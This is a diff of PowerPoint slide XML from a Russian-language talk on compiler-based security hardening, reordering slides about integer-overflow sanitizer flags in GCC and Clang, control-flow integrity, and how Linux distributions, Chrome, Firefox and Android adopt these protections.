-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>ftrapv</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" i="1" dirty="0"/>
-              <a:t>неработоспособна</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Clang: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=signed-integer-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>overflow,pointer</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-overflow -</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-minimal-runtime</a:t>
+              <a:t>Дискуссия в трекере </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>#1972043</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в Chrome (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>Chromium #</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0">
+                <a:hlinkClick r:id="rId3"/>
+              </a:rPr>
+              <a:t>40633061</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
             <a:pPr lvl="1"/>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Рекомендую также добавлять </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>-</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>fsanitize</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              </a:rPr>
-              <a:t>=integer</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>(может потребоваться добавить некоторые </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>STL </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>хедеры в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>blacklist</a:t>
+              <a:t>Исправление и отключение hot paths заняло ~4 месяца</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Пока не включён в Firefox (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId4"/>
+              </a:rPr>
+              <a:t>Trivial Auto Var Init Experiments</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0"/>
               <a:t>)</a:t>
             </a:r>
-            <a:endParaRPr lang="en-US" dirty="0">
-              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
-            </a:endParaRPr>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование в реальных проектах</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>:</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Защита не используется в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Ubuntu, Debian, Fedora</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>, а также в браузерах </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Android media stack:</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Android Developers Blog: Hardening media stack</a:t>
-            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="2"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0">
-                <a:hlinkClick r:id="rId3"/>
-              </a:rPr>
-              <a:t>Android Developers Blog: Compiler-based security mitigations in Android P</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включён в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android user</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>- и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>kernelspace</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="sv-SE" dirty="0">
+                <a:hlinkClick r:id="rId5"/>
+              </a:rPr>
+              <a:t>System hardening in Android 11</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -36622,7 +36388,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5801BD-7B4E-4514-8AA3-A09D92C0889F}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44EDC4A3-65C4-4E94-A281-A0BE05178B80}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36649,7 +36415,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925941201"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1607254691"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -36681,7 +36447,7 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A565717-4BAA-4EF0-AE04-1234344C22C6}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E390CB5-FF6E-4765-B937-FC6BA0EF02FC}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36698,14 +36464,21 @@
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CFI: </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Использование</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Целочисленные переполнения</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Как включить </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>?</a:t>
+            </a:r>
           </a:p>
         </p:txBody>
       </p:sp>
@@ -36714,7 +36487,7 @@
           <p:cNvPr id="3" name="Content Placeholder 2">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5643B7A-2796-4C8D-BF20-1D8525E29A55}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAADEE4F-0571-446A-90C7-1E44732CD1C9}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36728,146 +36501,275 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit/>
+            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Включена по дефолту на Android</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LLVM CFI </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не включена дефолтно для пакетов в Ubuntu, Debian, Fedora</a:t>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-trap=signed-integer-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>overflow,pointer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-overflow</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>GCC </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не поддерживает </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>integer</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Ещё раз отметим что </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>ftrapv</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0"/>
+              <a:t>неработоспособна</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Clang: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=signed-integer-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>overflow,pointer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-overflow -</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-minimal-runtime</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Рекомендую также добавлять </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>-</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>fsanitize</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              </a:rPr>
+              <a:t>=integer</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>(может потребоваться добавить некоторые </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>STL </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>хедеры в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>blacklist</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0">
+              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование в реальных проектах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>:</a:t>
+            </a:r>
+            <a:endParaRPr lang="ru-RU" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Защита не используется в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>, а также в браузерах </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Chrome </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Firefox</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена в </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>Android media stack:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
+                <a:hlinkClick r:id="rId2"/>
+              </a:rPr>
+              <a:t>Android Developers Blog: Hardening media stack</a:t>
             </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
           <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LTO + </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>отсутствие поддержки в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>GCC</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>Intel CET и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>AArch64 CFI </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>дефолтно включён для пакетов в </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId2"/>
-              </a:rPr>
-              <a:t>Ubuntu</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>,</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
+            <a:pPr lvl="2"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0">
                 <a:hlinkClick r:id="rId3"/>
               </a:rPr>
-              <a:t>Fedora</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t> и</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0">
-                <a:hlinkClick r:id="rId4"/>
-              </a:rPr>
-              <a:t>Debian</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Chrome </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>использует </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>LLVM CFI </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>X86 </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>и </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>AArch64 CFI </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>для </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>ARM</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr lvl="1"/>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Firefox </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0"/>
-              <a:t>не использует никакой вариант </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>CFI</a:t>
-            </a:r>
-            <a:endParaRPr lang="ru-RU" dirty="0"/>
-          </a:p>
-          <a:p>
+              <a:t>Android Developers Blog: Compiler-based security mitigations in Android P</a:t>
+            </a:r>
             <a:endParaRPr lang="en-US" dirty="0"/>
           </a:p>
         </p:txBody>
@@ -36877,7 +36779,7 @@
           <p:cNvPr id="4" name="Slide Number Placeholder 3">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8C47595-0B65-4B0B-B52F-087D9E003C62}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD5801BD-7B4E-4514-8AA3-A09D92C0889F}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -36904,7 +36806,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="498133543"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2925941201"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -36936,6 +36838,261 @@
           <p:cNvPr id="2" name="Title 1">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A565717-4BAA-4EF0-AE04-1234344C22C6}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>CFI: </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Использование</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5643B7A-2796-4C8D-BF20-1D8525E29A55}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr>
+            <a:normAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>Включена по дефолту на Android</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LLVM CFI </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
+              <a:t>не включена дефолтно для пакетов в Ubuntu, Debian, Fedora</a:t>
+            </a:r>
+            <a:endParaRPr lang="en-US" dirty="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr lvl="1"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>LTO + </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0"/>
